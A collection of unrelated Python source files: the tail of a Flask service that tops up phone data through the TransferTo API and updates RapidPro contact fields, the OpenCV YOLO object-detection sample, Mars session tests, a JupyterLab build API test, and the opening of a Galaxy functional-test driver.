print(tf.get_rapidpro_fields()['transferto_status'])
print(wait_time)
time.sleep(wait_time)
transferto_update = {'transferto_status' : "Success",
'transferto_timestamp' : datetime.datetime.now().strftime("%d-%m-%Y %H:%M")}
tf.write_rapidpro_fields(transferto_update)
print("%s %s %s" %(transferto_update,
json_data['phone'],
tf.get_rapidpro_fields()['transferto_status'])
)
except:
print('bad thread')
# Define a function for the long running transferto thread
def process_transferto(q):
while True:
try:
json_data = q.get()
tf = Transferto()
tf.read_transferto_credentials_file('transfertocredentials.json')
tf.read_rapidpro_credentials_file('rapidprocredentials.json')
tf.initiate_rapidpro_json(json_data)
fields = tf.get_rapidpro_fields()
tf.get_msisdn_products()
tf.get_product_id()
tf.payload_generation()
services = tf.post_transferto_goods('https://api.transferto.com/v1.1/transactions/fixed_value_recharges')
dict_vals = services.json()
print(dict_vals['status_message'])
transferto_update = {'transferto_status' : dict_vals['status_message'],
'transferto_timestamp' : datetime.datetime.now().strftime("%d-%m-%Y %H:%M")}
print(transferto_update)
tf.write_rapidpro_fields(transferto_update)
print("%s %s %s" %(transferto_update,
json_data['phone'],
tf.get_rapidpro_fields()['transferto_status']))
print(json.dumps(services.json()))
except:
print("bad thread didn't load %s" %(json_data['phone']))
app = Flask(__name__)
@app.route('/')
def home_screen():
return 'Hmmmm!'
@app.route('/getProducts', methods = ['POST'])
def get_product_object():
"""
End point to return the products associated with a phone number
"""
json_data = request.get_json()
tf = Transferto()
tf.read_transferto_credentials_file("transfertocredentials.json")
tf.initiate_rapidpro_json(json_data)
products = tf.get_msisdn_products()
return(json.dumps(products))
@app.route('/addData', methods = ['POST'])
def add_data_object():
"""
End point to actually load data onto a phone number
"""
json_data = request.get_json()
tf = Transferto()
tf.read_transferto_credentials_file("transfertocredentials.json")
tf.initiate_rapidpro_json(json_data)
tf.get_msisdn_products()
tf.get_product_id()
tf.payload_generation()
services = tf.post_transferto_goods('https://api.transferto.com/v1.1/transactions/fixed_value_recharges')
return(services.text)
@app.route('/rapidpro', methods = ['POST'])
def add_rapidpro_object():
"""
End point to actually load data onto a phone number
"""
json_data = request.form
print('hehre')
print(json_data['run'])
print(json_data['phone'])
tf = Transferto()
tf.read_transferto_credentials_file('transfertocredentials.json')
tf.read_rapidpro_credentials_file('rapidprocredentials.json')
tf.initiate_rapidpro_json(json_data)
fields = tf.get_rapidpro_fields()
tf.get_msisdn_products()
tf.get_product_id()
tf.payload_generation()
services = tf.post_transferto_goods('https://api.transferto.com/v1.1/transactions/fixed_value_recharges')
#return(services.text)
print(json.dumps(services.json()))
return(json.dumps(services.json()))
@app.route('/rapidprothreaded', methods = ['POST'])
def add_rapidpro_thread():
"""
End point to actually load data onto a phone number
"""
json_data = request.form
q.put(json_data)
return jsonify(
transferto_status='Starting',
transferto_timestamp=datetime.datetime.now().strftime("%d-%m-%Y %H:%M")
)
@app.route('/wait', methods = ['POST'])
def add_wait_thread():
"""
Testing end point
"""
json_data = request.form
q.put(json_data)
return jsonify(
transferto_status='Starting',
transferto_timestamp=datetime.datetime.now().strftime("%d-%m-%Y %H:%M")
)
if __name__ == '__main__':
q = Queue(maxsize=0)
num_threads = 1
for i in range(num_threads):
worker = Thread(target=process_transferto, args=(q,))
worker.setDaemon(True)
worker.start()
print('active threads = ')
print(active_count())
app.run(host= '0.0.0.0')
|
yolo_opencv_sample.py
|
# This sample is a copy from OpenCV version 4.4 Samples folder
import cv2 as cv
import argparse
import numpy as np
import sys
import time
from threading import Thread
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
from common import *
from tf_text_graph_common import readTextMessage
from tf_text_graph_ssd import createSSDGraph
from tf_text_graph_faster_rcnn import createFasterRCNNGraph
backends = (cv.dnn.DNN_BACKEND_DEFAULT, cv.dnn.DNN_BACKEND_HALIDE, cv.dnn.DNN_BACKEND_INFERENCE_ENGINE, cv.dnn.DNN_BACKEND_OPENCV)
targets = (cv.dnn.DNN_TARGET_CPU, cv.dnn.DNN_TARGET_OPENCL, cv.dnn.DNN_TARGET_OPENCL_FP16, cv.dnn.DNN_TARGET_MYRIAD)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--zoo', default=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'models.yml'),
help='An optional path to file with preprocessing parameters.')
parser.add_argument('--input', help='Path to input image or video file. Skip this argument to capture frames from a camera.')
parser.add_argument('--out_tf_graph', default='graph.pbtxt',
help='For models from TensorFlow Object Detection API, you may '
'pass a .config file which was used for training through --config '
'argument. This way an additional .pbtxt file with TensorFlow graph will be created.')
parser.add_argument('--framework', choices=['caffe', 'tensorflow', 'torch', 'darknet', 'dldt'],
help='Optional name of an origin framework of the model. '
'Detect it automatically if it does not set.')
parser.add_argument('--thr', type=float, default=0.5, help='Confidence threshold')
parser.add_argument('--nms', type=float, default=0.4, help='Non-maximum suppression threshold')
parser.add_argument('--backend', choices=backends, default=cv.dnn.DNN_BACKEND_DEFAULT, type=int,
help="Choose one of computation backends: "
"%d: automatically (by default), "
"%d: Halide language (http://halide-lang.org/), "
"%d: Intel's Deep Learning Inference Engine (https://software.intel.com/openvino-toolkit), "
"%d: OpenCV implementation" % backends)
parser.add_argument('--target', choices=targets, default=cv.dnn.DNN_TARGET_CPU, type=int,
help='Choose one of target computation devices: '
'%d: CPU target (by default), '
'%d: OpenCL, '
'%d: OpenCL fp16 (half-float precision), '
'%d: VPU' % targets)
parser.add_argument('--async', type=int, default=0,
dest='asyncN',
help='Number of asynchronous forwards at the same time. '
'Choose 0 for synchronous mode')
args, _ = parser.parse_known_args()
add_preproc_args(args.zoo, parser, 'object_detection')
parser = argparse.ArgumentParser(parents=[parser],
description='Use this script to run object detection deep learning networks using OpenCV.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
args = parser.parse_args()
args.model = findFile(args.model)
args.config = findFile(args.config)
args.classes = findFile(args.classes)
# If config specified, try to load it as TensorFlow Object Detection API's pipeline.
config = readTextMessage(args.config)
if 'model' in config:
print('TensorFlow Object Detection API config detected')
if 'ssd' in config['model'][0]:
print('Preparing text graph representation for SSD model: ' + args.out_tf_graph)
createSSDGraph(args.model, args.config, args.out_tf_graph)
args.config = args.out_tf_graph
elif 'faster_rcnn' in config['model'][0]:
print('Preparing text graph representation for Faster-RCNN model: ' + args.out_tf_graph)
createFasterRCNNGraph(args.model, args.config, args.out_tf_graph)
args.config = args.out_tf_graph
# Load names of classes
classes = None
if args.classes:
with open(args.classes, 'rt') as f:
classes = f.read().rstrip('\n').split('\n')
# Load a network
net = cv.dnn.readNet(cv.samples.findFile(args.model), cv.samples.findFile(args.config), args.framework)
net.setPreferableBackend(args.backend)
net.setPreferableTarget(args.target)
outNames = net.getUnconnectedOutLayersNames()
confThreshold = args.thr
nmsThreshold = args.nms
def postprocess(frame, outs):
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
def drawPred(classId, conf, left, top, right, bottom):
# Draw a bounding box.
cv.rectangle(frame, (left, top), (right, bottom), (0, 255, 0))
label = '%.2f' % conf
# Print a label of class.
if classes:
assert(classId < len(classes))
label = '%s: %s' % (classes[classId], label)
labelSize, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, labelSize[1])
cv.rectangle(frame, (left, top - labelSize[1]), (left + labelSize[0], top + baseLine), (255, 255, 255), cv.FILLED)
cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))
layerNames = net.getLayerNames()
lastLayerId = net.getLayerId(layerNames[-1])
lastLayer = net.getLayer(lastLayerId)
classIds = []
confidences = []
boxes = []
if lastLayer.type == 'DetectionOutput':
# Network produces output blob with a shape 1x1xNx7 where N is a number of
# detections and an every detection is a vector of values
# [batchId, classId, confidence, left, top, right, bottom]
for out in outs:
for detection in out[0, 0]:
confidence = detection[2]
if confidence > confThreshold:
left = int(detection[3])
top = int(detection[4])
right = int(detection[5])
bottom = int(detection[6])
width = right - left + 1
height = bottom - top + 1
if width <= 2 or height <= 2:
left = int(detection[3] * frameWidth)
top = int(detection[4] * frameHeight)
right = int(detection[5] * frameWidth)
bottom = int(detection[6] * frameHeight)
width = right - left + 1
height = bottom - top + 1
classIds.append(int(detection[1]) - 1) # Skip background label
confidences.append(float(confidence))
boxes.append([left, top, width, height])
elif lastLayer.type == 'Region':
# Network produces output blob with a shape NxC where N is a number of
# detected objects and C is a number of classes + 4 where the first 4
# numbers are [center_x, center_y, width, height]
for out in outs:
for detection in out:
scores = detection[5:]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confThreshold:
center_x = int(detection[0] * frameWidth)
center_y = int(detection[1] * frameHeight)
width = int(detection[2] * frameWidth)
height = int(detection[3] * frameHeight)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
classIds.append(classId)
confidences.append(float(confidence))
boxes.append([left, top, width, height])
else:
print('Unknown output layer type: ' + lastLayer.type)
exit()
# NMS is used inside Region layer only on DNN_BACKEND_OPENCV for another backends we need NMS in sample
# or NMS is required if number of outputs > 1
if len(outNames) > 1 or lastLayer.type == 'Region' and args.backend != cv.dnn.DNN_BACKEND_OPENCV:
indices = []
classIds = np.array(classIds)
boxes = np.array(boxes)
confidences = np.array(confidences)
unique_classes = set(classIds)
for cl in unique_classes:
class_indices = np.where(classIds == cl)[0]
conf = confidences[class_indices]
box = boxes[class_indices].tolist()
nms_indices = cv.dnn.NMSBoxes(box, conf, confThreshold, nmsThreshold)
nms_indices = nms_indices[:, 0] if len(nms_indices) else []
indices.extend(class_indices[nms_indices])
else:
indices = np.arange(0, len(classIds))
for i in indices:
box = boxes[i]
left = box[0]
top = box[1]
width = box[2]
height = box[3]
drawPred(classIds[i], confidences[i], left, top, left + width, top + height)
# Process inputs
winName = 'Deep learning object detection in OpenCV'
cv.namedWindow(winName, cv.WINDOW_NORMAL)
def callback(pos):
global confThreshold
confThreshold = pos / 100.0
cv.createTrackbar('Confidence threshold, %', winName, int(confThreshold * 100), 99, callback)
cap = cv.VideoCapture(cv.samples.findFileOrKeep(args.input) if args.input else 0)
class QueueFPS(queue.Queue):
def __init__(self):
queue.Queue.__init__(self)
self.startTime = 0
self.counter = 0
def put(self, v):
queue.Queue.put(self, v)
self.counter += 1
if self.counter == 1:
self.startTime = time.time()
def getFPS(self):
return self.counter / (time.time() - self.startTime)
process = True
#
# Frames capturing thread
#
framesQueue = QueueFPS()
def framesThreadBody():
global framesQueue, process
while process:
hasFrame, frame = cap.read()
if not hasFrame:
break
framesQueue.put(frame)
#
# Frames processing thread
#
processedFramesQueue = queue.Queue()
predictionsQueue = QueueFPS()
def processingThreadBody():
global processedFramesQueue, predictionsQueue, args, process
futureOutputs = []
while process:
# Get a next frame
frame = None
try:
frame = framesQueue.get_nowait()
if args.asyncN:
if len(futureOutputs) == args.asyncN:
frame = None # Skip the frame
else:
framesQueue.queue.clear() # Skip the rest of frames
except queue.Empty:
pass
if not frame is None:
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
# Create a 4D blob from a frame.
inpWidth = args.width if args.width else frameWidth
inpHeight = args.height if args.height else frameHeight
blob = cv.dnn.blobFromImage(frame, size=(inpWidth, inpHeight), swapRB=args.rgb, ddepth=cv.CV_8U)
processedFramesQueue.put(frame)
# Run a model
net.setInput(blob, scalefactor=args.scale, mean=args.mean)
if net.getLayer(0).outputNameToIndex('im_info') != -1: # Faster-RCNN or R-FCN
frame = cv.resize(frame, (inpWidth, inpHeight))
net.setInput(np.array([[inpHeight, inpWidth, 1.6]], dtype=np.float32), 'im_info')
if args.asyncN:
futureOutputs.append(net.forwardAsync())
else:
outs = net.forward(outNames)
predictionsQueue.put(np.copy(outs))
while futureOutputs and futureOutputs[0].wait_for(0):
out = futureOutputs[0].get()
predictionsQueue.put(np.copy([out]))
del futureOutputs[0]
framesThread = Thread(target=framesThreadBody)
framesThread.start()
processingThread = Thread(target=processingThreadBody)
processingThread.start()
#
# Postprocessing and rendering loop
#
while cv.waitKey(1) < 0:
try:
# Request prediction first because they put after frames
outs = predictionsQueue.get_nowait()
frame = processedFramesQueue.get_nowait()
postprocess(frame, outs)
# Put efficiency information.
if predictionsQueue.counter > 1:
label = 'Camera: %.2f FPS' % (framesQueue.getFPS())
cv.putText(frame, label, (0, 15), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
label = 'Network: %.2f FPS' % (predictionsQueue.getFPS())
cv.putText(frame, label, (0, 30), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
label = 'Skipped frames: %d' % (framesQueue.counter - predictionsQueue.counter)
cv.putText(frame, label, (0, 45), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
cv.imshow(winName, frame)
except queue.Empty:
pass
process = False
framesThread.join()
processingThread.join()
|
test_session.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import sys
import tempfile
from collections import namedtuple
import numpy as np
import pandas as pd
import pytest
try:
import pyarrow as pa
except ImportError: # pragma: no cover
pa = None
import mars.tensor as mt
import mars.dataframe as md
import mars.remote as mr
from mars._version import __version__ as mars_version
from mars.config import option_context
from mars.deploy.utils import load_service_config_file
from mars.session import execute, fetch, fetch_log
test_namedtuple_type = namedtuple('TestNamedTuple', 'a b')
@pytest.fixture
def setup():
from ..deploy.oscar.tests.session import new_test_session
sess = new_test_session(address='127.0.0.1',
init_local=True,
default=True)
assert sess.get_cluster_versions() == [mars_version]
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_session_async_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
expected = raw_a.sum()
res = a.sum().to_numpy(wait=False).result()
assert expected == res
res = a.sum().execute(wait=False)
res = res.result().fetch()
assert expected == res
raw_df = pd.DataFrame(raw_a)
expected = raw_df.sum()
df = md.DataFrame(a)
res = df.sum().to_pandas(wait=False).result()
pd.testing.assert_series_equal(expected, res)
res = df.sum().execute(wait=False)
res = res.result().fetch()
pd.testing.assert_series_equal(expected, res)
t = [df.sum(), a.sum()]
res = mt.ExecutableTuple(t).to_object(wait=False).result()
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
res = mt.ExecutableTuple(t).execute(wait=False)
res = fetch(*res.result())
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
def test_executable_tuple_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
raw_df = pd.DataFrame(raw_a)
df = md.DataFrame(raw_df)
tp = test_namedtuple_type(a, df)
executable_tp = mt.ExecutableTuple(tp)
assert 'a' in dir(executable_tp)
assert executable_tp.a is a
assert test_namedtuple_type.__name__ in repr(executable_tp)
with pytest.raises(AttributeError):
getattr(executable_tp, 'c')
res = mt.ExecutableTuple(tp).execute().fetch()
assert test_namedtuple_type is type(res)
np.testing.assert_array_equal(raw_a, res.a)
pd.testing.assert_frame_equal(raw_df, res.b)
def test_multiple_output_execute(setup):
data = np.random.random((5, 9))
# test multiple outputs
arr1 = mt.tensor(data.copy(), chunk_size=3)
result = mt.modf(arr1).execute().fetch()
expected = np.modf(data)
np.testing.assert_array_equal(result[0], expected[0])
np.testing.assert_array_equal(result[1], expected[1])
# test 1 output
arr2 = mt.tensor(data.copy(), chunk_size=3)
result = ((arr2 + 1) * 2).to_numpy()
expected = (data + 1) * 2
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
arr3 = mt.tensor(data.copy(), chunk_size=3)
arrs = mt.split(arr3, 3, axis=1)
result = arrs[0].to_numpy()
expected = np.split(data, 3, axis=1)[0]
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
data = np.random.randint(0, 10, (5, 5))
arr3 = (mt.tensor(data) + 1) * 2
arrs = mt.linalg.qr(arr3)
result = (arrs[0] + 1).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 1
np.testing.assert_array_almost_equal(result, expected)
result = (arrs[0] + 2).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 2
np.testing.assert_array_almost_equal(result, expected)
s = mt.shape(0)
result = s.execute().fetch()
expected = np.shape(0)
assert result == expected
def test_closed_session():
from ..deploy.oscar.tests.session import new_test_session
session = new_test_session(default=True)
with option_context({'show_progress': False}):
arr = mt.ones((10, 10))
result = session.execute(arr)
np.testing.assert_array_equal(result, np.ones((10, 10)))
# close session
session.close()
with pytest.raises(RuntimeError):
session.execute(arr)
with pytest.raises(RuntimeError):
session.execute(arr + 1)
def test_array_protocol(setup):
arr = mt.ones((10, 20))
result = np.asarray(arr)
np.testing.assert_array_equal(result, np.ones((10, 20)))
arr2 = mt.ones((10, 20))
result = np.asarray(arr2, mt.bool_)
np.testing.assert_array_equal(result, np.ones((10, 20), dtype=np.bool_))
arr3 = mt.ones((10, 20)).sum()
result = np.asarray(arr3)
np.testing.assert_array_equal(result, np.asarray(200))
arr4 = mt.ones((10, 20)).sum()
result = np.asarray(arr4, dtype=np.float_)
np.testing.assert_array_equal(result, np.asarray(200, dtype=np.float_))
def test_without_fuse(setup):
arr1 = (mt.ones((10, 10), chunk_size=6) + 1) * 2
r1 = arr1.execute(fuse_enabled=False).fetch()
arr2 = (mt.ones((10, 10), chunk_size=5) + 1) * 2
r2 = arr2.execute(fuse_enabled=False).fetch()
np.testing.assert_array_equal(r1, r2)
def test_fetch_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
r1 = arr1.execute().fetch()
r2 = arr1[:2, 3:9].fetch()
np.testing.assert_array_equal(r2, r1[:2, 3:9])
r3 = arr1[0].fetch()
np.testing.assert_array_equal(r3, r1[0])
def test_fetch_dataframe_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
df1 = md.DataFrame(arr1)
r1 = df1.execute().fetch()
r2 = df1.iloc[:, :].fetch()
pd.testing.assert_frame_equal(r2, r1.iloc[:, :])
r3 = df1.iloc[1].fetch(extra_config={'check_series_name': False})
pd.testing.assert_series_equal(r3, r1.iloc[1])
r4 = df1.iloc[0, 2].fetch()
assert r4 == r1.iloc[0, 2]
arr2 = mt.random.rand(10, 3, chunk_size=3)
df2 = md.DataFrame(arr2)
r5 = df2.execute().fetch()
r6 = df2.iloc[:4].fetch(batch_size=3)
pd.testing.assert_frame_equal(r5.iloc[:4], r6)
def test_repr(setup):
# test tensor repr
with np.printoptions(threshold=100):
arr = np.random.randint(1000, size=(11, 4, 13))
t = mt.tensor(arr, chunk_size=3)
result = repr(t.execute())
expected = repr(arr)
assert result == expected
for size in (5, 58, 60, 62, 64):
pdf = pd.DataFrame(np.random.randint(1000, size=(size, 10)))
# test DataFrame repr
df = md.DataFrame(pdf, chunk_size=size//2)
result = repr(df.execute())
expected = repr(pdf)
assert result == expected
# test DataFrame _repr_html_
result = df.execute()._repr_html_()
expected = pdf._repr_html_()
assert result == expected
# test Series repr
ps = pdf[0]
s = md.Series(ps, chunk_size=size//2)
result = repr(s.execute())
expected = repr(ps)
assert result == expected
# test Index repr
pind = pd.date_range('2020-1-1', periods=10)
ind = md.Index(pind, chunk_size=5)
assert 'DatetimeIndex' in repr(ind.execute())
# test groupby repr
df = md.DataFrame(pd.DataFrame(np.random.rand(100, 3), columns=list('abc')))
grouped = df.groupby(['a', 'b']).execute()
assert 'DataFrameGroupBy' in repr(grouped)
# test Categorical repr
c = md.qcut(range(5), 3)
assert 'Categorical' in repr(c)
assert 'Categorical' in str(c)
assert repr(c.execute()) == repr(pd.qcut(range(5), 3))
def test_iter(setup):
raw_data = pd.DataFrame(np.random.randint(1000, size=(20, 10)))
df = md.DataFrame(raw_data, chunk_size=5)
for col, series in df.iteritems():
pd.testing.assert_series_equal(series.execute().fetch(), raw_data[col])
for i, batch in enumerate(df.iterbatch(batch_size=15)):
pd.testing.assert_frame_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_row, expect_row in zip(df.iterrows(batch_size=15),
raw_data.iterrows()):
assert result_row[0] == expect_row[0]
pd.testing.assert_series_equal(result_row[1], expect_row[1])
i += 1
assert i == len(raw_data)
i = 0
for result_tup, expect_tup in zip(df.itertuples(batch_size=10),
raw_data.itertuples()):
assert result_tup == expect_tup
i += 1
assert i == len(raw_data)
raw_data = pd.Series(np.random.randint(1000, size=(20,)))
s = md.Series(raw_data, chunk_size=5)
for i, batch in enumerate(s.iterbatch(batch_size=15)):
pd.testing.assert_series_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_item, expect_item in zip(s.iteritems(batch_size=15),
raw_data.iteritems()):
assert result_item[0] == expect_item[0]
assert result_item[1] == expect_item[1]
i += 1
assert i == len(raw_data)
# test to_dict
assert s.to_dict() == raw_data.to_dict()
CONFIG = """
inherits: '@default'
session:
custom_log_dir: '{custom_log_dir}'
"""
@pytest.fixture
def fetch_log_setup():
from ..deploy.oscar.tests.session import new_test_session
with tempfile.TemporaryDirectory() as temp_dir:
config = io.StringIO(CONFIG.format(custom_log_dir=temp_dir))
sess = new_test_session(default=True,
config=load_service_config_file(config),
n_cpu=8)
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_fetch_log(fetch_log_setup):
def f():
print('test')
r = mr.spawn(f)
r.execute()
log = r.fetch_log()
assert str(log).strip() == 'test'
# test multiple functions
def f1(size):
print('f1' * size)
sys.stdout.flush()
fs = mr.ExecutableTuple([mr.spawn(f1, 30), mr.spawn(f1, 40)])
execute(*fs)
log = fetch_log(*fs, offsets=20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30)[20:30]
assert str(log[1]).strip() == ('f1' * 40)[20:30]
assert len(log[0].offsets) > 0
assert all(s > 0 for s in log[0].offsets)
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets)
assert len(log[0].chunk_op_keys) > 0
# test negative offsets
log = fs.fetch_log(offsets=-20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
# test negative offsets which represented in string
log = fetch_log(*fs, offsets='-0.02K', sizes='0.01K')
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
def test_nested():
print('level0')
fr = mr.spawn(f1, 1)
fr.execute()
print(fr.fetch_log())
r = mr.spawn(test_nested)
r.execute()
log = str(r.fetch_log())
assert 'level0' in log
assert 'f1' in log
df = md.DataFrame(mt.random.rand(10, 3), chunk_size=5)
def df_func(c):
print('df func')
return c
df2 = df.map_chunk(df_func)
df2.execute()
log = df2.fetch_log()
assert 'Chunk op key:' in str(log)
assert 'df func' in repr(log)
assert len(str(df.fetch_log())) == 0
def test_host(rndf):
rm = mr.spawn(nested, rndf)
rm.execute()
print(rm.fetch_log())
def nested(_rndf):
print('log_content')
ds = [mr.spawn(test_host, n, retry_when_fail=False)
for n in np.random.rand(4)]
xtp = execute(*ds)
for log in fetch_log(*xtp):
assert str(log).strip() == 'log_content'
def test_threaded():
import threading
exc_info = None
def print_fun():
nonlocal exc_info
try:
print('inner')
except: # noqa: E722 # nosec # pylint: disable=bare-except
exc_info = sys.exc_info()
print_thread = threading.Thread(target=print_fun)
print_thread.start()
print_thread.join()
if exc_info is not None:
raise exc_info[1].with_traceback(exc_info[-1])
print('after')
rm = mr.spawn(test_threaded)
rm.execute()
logs = str(rm.fetch_log()).strip()
assert logs == 'inner\nafter'
|
test_build_api.py
|
"""Test the kernels service API."""
from tempfile import TemporaryDirectory
import threading
from jupyterlab.labapp import LabApp
from jupyterlab_server.tests.utils import APITester, LabTestBase
from notebook.tests.launchnotebook import assert_http_error
class BuildAPITester(APITester):
"""Wrapper for build REST API requests"""
url = 'lab/api/build'
def getStatus(self):
return self._req('GET', '')
def build(self):
return self._req('POST', '')
def clear(self):
return self._req('DELETE', '')
class BuildAPITest(LabTestBase):
"""Test the build web service API"""
Application = LabApp
def tempdir(self):
td = TemporaryDirectory()
self.tempdirs.append(td)
return td.name
def setUp(self):
# Any TemporaryDirectory objects appended to this list will be cleaned
# up at the end of the test run.
self.tempdirs = []
@self.addCleanup
def cleanup_tempdirs():
for d in self.tempdirs:
d.cleanup()
self.build_api = BuildAPITester(self.request)
def test_get_status(self):
"""Make sure there are no kernels running at the start"""
resp = self.build_api.getStatus().json()
assert 'status' in resp
assert 'message' in resp
def test_build(self):
resp = self.build_api.build()
assert resp.status_code == 200
def test_clear(self):
with assert_http_error(500):
self.build_api.clear()
def build_thread():
with assert_http_error(500):
self.build_api.build()
t1 = threading.Thread(target=build_thread)
t1.start()
while 1:
resp = self.build_api.getStatus().json()
if resp['status'] == 'building':
break
resp = self.build_api.clear()
assert resp.status_code == 204
|
driver_util.py
|
"""Scripts for drivers of Galaxy functional tests."""
import collections
import httplib
import json
import logging
import os
import random
import shutil
import socket
import sys
import tempfile
import threading
import time
from six.moves.urllib.request import urlretrieve
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
from paste import httpserver
from .api_util import get_master_api_key, get_user_api_key
from .tool_shed_util import parse_tool_panel_config
from .nose_util import run
from .instrument import StructuredTestDataPlugin
from functional import database_contexts
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.web import buildapp
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from galaxy.util import asbool
from galaxy.util.properties import load_app_properties
from base.test_logging import logging_config_file
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
DEFAULT_WEB_HOST = "localhost"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(GALAXY_TEST_DIRECTORY, "shed_functional", "test_data")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = tempfile.mkdtemp()
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ[ 'TOOL_SHED_TEST_TMP_DIR' ] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
def build_logger():
"""Build a logger for test driver script."""
return log
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
):
"""Setup environment and build config for test Galaxy instance."""
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
file_path = os.path.join(tmpdir, 'files')
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir )
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
